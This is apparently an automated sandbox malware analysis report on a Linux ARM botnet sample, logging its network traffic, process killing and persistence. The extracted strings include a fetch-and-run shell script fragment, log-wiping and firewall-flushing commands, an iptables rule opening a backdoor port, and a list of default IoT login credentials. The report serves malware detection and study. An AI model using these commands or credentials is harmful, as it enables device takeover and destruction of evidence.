              Source: unknownUDP traffic detected without corresponding DNS query: 94.16.114.254
              Source: unknownUDP traffic detected without corresponding DNS query: 94.16.114.254
              Source: unknownUDP traffic detected without corresponding DNS query: 94.16.114.254
              Source: unknownUDP traffic detected without corresponding DNS query: 51.77.149.139
              Source: unknownUDP traffic detected without corresponding DNS query: 81.169.136.222
              Source: unknownUDP traffic detected without corresponding DNS query: 51.158.108.203
              Source: unknownUDP traffic detected without corresponding DNS query: 91.217.137.37
              Source: unknownUDP traffic detected without corresponding DNS query: 91.217.137.37
              Source: unknownUDP traffic detected without corresponding DNS query: 91.217.137.37
              Source: unknownUDP traffic detected without corresponding DNS query: 91.217.137.37
              Source: unknownUDP traffic detected without corresponding DNS query: 91.217.137.37
              Source: unknownUDP traffic detected without corresponding DNS query: 94.16.114.254
              Source: unknownUDP traffic detected without corresponding DNS query: 94.16.114.254
              Source: unknownUDP traffic detected without corresponding DNS query: 94.16.114.254
              Source: unknownUDP traffic detected without corresponding DNS query: 94.16.114.254
              Source: unknownUDP traffic detected without corresponding DNS query: 94.16.114.254
              Source: unknownUDP traffic detected without corresponding DNS query: 134.195.4.2
              Source: global trafficDNS traffic detected: DNS query: octopus1337.geek
              Source: arm5.elfString found in binary or memory: http://Change_ip/octopus_re.sh;chmod
              Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

              System Summary

              barindex
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6334, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6376, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6379, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6382, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6331, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6427, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6429, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6422, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6430, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6471, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6473, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6468, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6475, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6474, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6478, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6479, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6517, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6525, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6526, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6503, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6533, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6534, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6559, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6604, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6633, result: no such processJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 796, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 799, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1349, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1389, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1463, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1465, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1477, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1489, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1579, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1582, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1586, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1594, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1599, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1622, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1623, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1627, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1629, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1632, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1633, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1638, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1639, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1642, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1648, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1654, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1656, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1661, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1664, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1668, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1698, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1699, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1809, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1888, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1890, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2009, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2018, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2033, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2038, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2077, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2078, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2079, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2080, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2083, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2084, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2114, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2128, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2129, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2146, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2156, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2180, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2195, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2208, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2226, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2235, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2242, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2275, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2281, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2285, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2289, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2294, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2307, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2637, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 3236, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 6241, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 6484, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 6531, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 6532, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 6534, result: no such processJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 6596, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 6633, result: successfulJump to behavior
              Source: Initial sampleString containing 'busybox' found: pkill -9 busybox
              Source: Initial sampleString containing 'busybox' found: armrm -rf /tmp/* /var/* /var/run/* /var/tmp/* /var/log/wtmprm -rf /tmp/*iptables -Fpkill -9 busyboxpkill -9 perlpkill -9 pythonservice iptables stop/sbin/iptables -F; /sbin/iptables -Xservice firewall stophistory -crm -rf ~/.bash_historyhistory -w0.0.0.0
              Source: Initial sampleString containing 'busybox' found: /bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
              Source: Initial sampleString containing 'busybox' found: busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
              Source: Initial sampleString containing 'busybox' found: systemctl daemon-reload;systemctl enable nginnx.service;systemctl start nginnx.service;sh -c systemctl daemon-reload;systemctl enable nginnxsshd%x/dev/watchdog/dev/misc/watchdogwatchdogrootPon521Zte521root621vizxvoelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.admin7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_ja12345t0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantech1234dreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123telnetipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxpasswordsupportadmintelnetadminadmintelecomguestftpusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8lJwpbo6tluafedbinvstarcam201520150602supporthikvisione8ehomeasbe8ehomee8telnetciscosetsockoptbindlisten1.1.1.1hi im here, i think/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPTbusybox iptables -A INPUT
              Source: ELF static info symbol of initial sample.symtab present: no
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6334, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6376, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6379, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6382, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6331, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6427, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6429, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6422, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6430, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6471, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6473, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6468, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6475, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6474, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6478, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6479, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6517, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6525, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6526, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6503, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6533, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6534, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6559, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6604, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6295)SIGKILL sent: pid: 6633, result: no such processJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 796, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 799, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1349, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1389, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1463, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1465, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1477, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1489, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1579, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1582, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1586, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1594, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1599, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1622, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1623, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1627, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1629, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1632, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1633, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1638, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1639, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1642, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1648, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1654, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1656, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1661, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1664, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1668, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1698, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1699, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1809, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1888, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 1890, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2009, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2018, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2033, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2038, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2077, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2078, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2079, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2080, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2083, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2084, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2114, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2128, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2129, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2146, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2156, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2180, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2195, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2208, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2226, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2235, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2242, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2275, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2281, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2285, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2289, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2294, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2307, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 2637, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 3236, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 6241, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 6484, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 6531, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 6532, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 6534, result: no such processJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 6596, result: successfulJump to behavior
              Source: /tmp/arm5.elf (PID: 6297)SIGKILL sent: pid: 6633, result: successfulJump to behavior
              Source: classification engineClassification label: mal96.spre.troj.evad.linELF@0/2@46/0

              Data Obfuscation

              barindex
              Source: /tmp/arm5.elf (PID: 6299)Written: /dev/ocmountJump to behavior

              Persistence and Installation Behavior

              barindex
              Source: /bin/sh (PID: 6623)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPTJump to behavior
              Source: /bin/sh (PID: 6597)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPTJump to behavior
              Source: /bin/sh (PID: 6332)File: /etc/cron.d/mount.shJump to behavior
              Source: /usr/sbin/service (PID: 6263)Systemctl executable stopping iptables: /usr/sbin/systemctl -> systemctl stop iptables.serviceJump to behavior
              Source: /usr/sbin/service (PID: 6263)Systemctl executable stopping iptables: /usr/bin/systemctl -> systemctl stop iptables.serviceJump to behavior
              Source: /usr/bin/rm (PID: 6221)Directory: /var/lib/php/..Jump to behavior
              Source: /usr/bin/rm (PID: 6221)Directory: /var/lib/gdm3/.cacheJump to behavior
              Source: /usr/bin/rm (PID: 6221)Directory: /var/lib/gdm3/.cacheJump to behavior
              Source: /usr/bin/rm (PID: 6221)Directory: /var/lib/gdm3/.configJump to behavior
              Source: /usr/bin/rm (PID: 6221)Directory: /var/lib/gdm3/.configJump to behavior
              Source: /usr/bin/rm (PID: 6221)Directory: /var/lib/gdm3/.localJump to behavior
              Source: /usr/bin/rm (PID: 6221)Directory: /var/lib/gdm3/.localJump to behavior
              Source: /usr/bin/rm (PID: 6221)Directory: /var/lib/snapd/assertions/asserts-v0/..Jump to behavior
              Source: /usr/bin/rm (PID: 6221)Directory: /var/lib/snapd/assertions/..Jump to behavior
              Source: /usr/bin/rm (PID: 6221)Directory: /var/lib/snapd/..Jump to behavior
              Source: /usr/bin/rm (PID: 6221)Directory: /var/lib/colord/.cacheJump to behavior
              Source: /usr/bin/rm (PID: 6221)Directory: /var/lib/systemd/deb-systemd-helper-enabled/.wantsJump to behavior
              Source: /usr/bin/rm (PID: 6221)Directory: /var/lib/systemd/deb-systemd-helper-enabled/.wantsJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/1582/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/1582/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/3088/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/3088/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/230/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/230/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/110/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/110/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/231/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/231/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/111/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/111/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/232/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/232/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/1579/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/1579/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/112/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/112/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/233/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/233/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/1699/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/1699/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/113/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/113/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/234/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/234/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/1335/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/1335/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/1698/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/1698/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/114/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/114/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/235/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/235/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/1334/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/1334/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/1576/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/1576/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/2302/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/2302/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/115/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/115/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/236/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/236/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/116/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/116/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/237/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/237/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/117/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/117/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/118/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/118/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/910/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/910/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/119/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/119/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/912/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/912/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/10/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/10/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/2307/statusJump to behavior
